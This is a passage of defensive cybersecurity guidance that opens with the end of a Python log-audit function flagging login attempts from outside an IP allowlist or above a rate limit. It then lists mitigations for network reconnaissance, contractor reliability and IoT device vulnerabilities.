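        m = LINE_RE.match(line)
        if not m or m["path"].split("?")[0] != LOGIN_PATH:
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue            # host name or garbage in the client field
        if not any(ip in net for net in ALLOWED_NETS):
            outside.add(str(ip))
        if m["method"] == "POST":
            posts[str(ip)].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))

    findings = [(ip, "outside-allowlist") for ip in sorted(outside)]
    for ip, times in sorted(posts.items()):
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window so it never spans more than WINDOW.
            while times[end] - times[start] > WINDOW:
                start += 1
            if end - start + 1 > MAX_ATTEMPTS:
                findings.append((ip, "attempt-limit-exceeded"))
                break
    return findings
```

An "outside-allowlist" finding means the firewall rule from point 3 is missing or not effective; an "attempt-limit-exceeded" finding means the CMS accepted more login submissions in the window than the configured limit should allow.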

Mitigating threats of Electronic Communications Network Reconnaissance

1. Change device ports to less frequently used ones, disable unused ports, and enable a reverse proxy to prevent active services and hardware or software from being identified from outside.

Mitigation of threats related to the reliability of contractors

1. It is recommended to purchase hardware and software only from official sources and suppliers that operate under the General Data Protection Regulation and protect data in NATO or EU countries, and to limit hardware or software functionality and the availability of information and services (for example, disable the ability to record sound or activate the camera on the smartphone, and prevent any connection between the technological network and the Internet in the organization).

2. It is recommended to purchase hardware and software from sources that are of good repute and pose no risk of cooperation with non-NATO and non-EU foreign intelligence services.

3. Provide contractors with limited access to CIS, avoid giving them remote access to CIS, and monitor and audit communication logs.

* https://www.nksc.lt/irankiai.html

Mitigation of threats related to device vulnerabilities

1. Change the default passwords of the devices.

2. Regularly update IoT applications and software.

3. Disable the possibility to save passwords on IoT devices.

4. Purchase and use devices that encrypt their communication sessions.

5. Wherever possible, check whether the device supports excessive functionality (open ports).

6. Before purchasing a device, make sure that its manufacturer meets the requirements of the General Data Protection Regulation or that the data sent is protected by EU law.

7. Avoid unknown manufacturers whose country of origin and reliability are difficult to check.